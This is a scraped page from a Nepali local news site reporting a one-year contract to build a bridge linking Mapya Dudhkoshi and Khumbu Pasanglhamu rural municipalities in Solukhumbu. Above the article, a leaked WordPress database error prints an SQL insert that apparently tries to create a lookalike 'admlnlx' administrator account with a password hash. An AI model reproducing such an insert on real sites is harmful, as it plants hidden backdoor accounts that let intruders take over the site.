WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwNuoMIDPz1e5r0jgIIJJAwIv4d2D1/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:29:08', '', 'admlnlx', 'admlnlx')

माप्य दुधकोशी र खुम्बु पासाङल्यामु जोड्ने पुल सम्झौता, १ बर्षमा सम्पन्न गर्ने – Gaule Khabar

माप्य दुधकोशी र खुम्बु पासाङल्यामु जोड्ने पुल सम्झौता, १ बर्षमा सम्पन्न गर्ने

माप्य दुधकोशी र खुम्बु पासाङल्यामु जोड्ने पुल सम्झौता, १ बर्षमा सम्पन्न गर्ने

गाउँले न्यूज, १४ बैशाख, सोलुखुम्बु । माप्यदूधकोशी गाउँपालिका र खुम्बु पासाङल्हमु गाउँपालिका जोड्ने मितेरी ट्रष्ट ब्रिजको लागि शुक्रबार सम्झौता भएको छ । माप्यदूधकोशी गाउँपालिका, खुम्बुपासाङल्हमु गाउँपालिका, प्रदेश न १ र केन्द्रिय सरकारको करिब १० करोडको लगानीमा उक्त पुल निर्माणका लागि माप्य दुधकोशी गाउँपालिका र जलब नेपाल प्रा.लि. बीच सम्झौता भएको हो ।
हिजो शुक्रबार माप्य दुधकोशी गाउँपालिकाको कार्यालयमा भएको सम्झौता पत्रमा माप्य दुधकोशी गाउँपालिकाको तर्फबाट नि. प्रशासकिय प्रमुख पशुपती पोखरेल र जलब नेपाल प्रा.लि.को तर्फबाट दुर्गा कुमार श्रेष्ठले हस्ताक्षर गरेका छन ।
उक्त्त सम्झौता पत्रमा १ वर्षभित्र पुल सम्पन्न गरिसक्ने गरी सम्झौता गरिएको गाउँपालिका उपाध्यक्ष जुनिता मगरले बताए ।
गाउँपालिका उपप्रमुख जुनिता मगर, गाउँपालिका नि प्रशासकिय प्रमुख पशुपति पोख्रेल, सिभिल ईन्जिनियरिङ जोनाथान राई, पशु प्राविधिक दीपेन्द्र बस्नेत, जलब नेपाल प्राईभेट कम्पनी लिमिटेडका २ जना कर्मचारी लगायतको समूहले सोही स्थानमा गई स्थलगत निरिक्षणसमेत गरेका छन ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका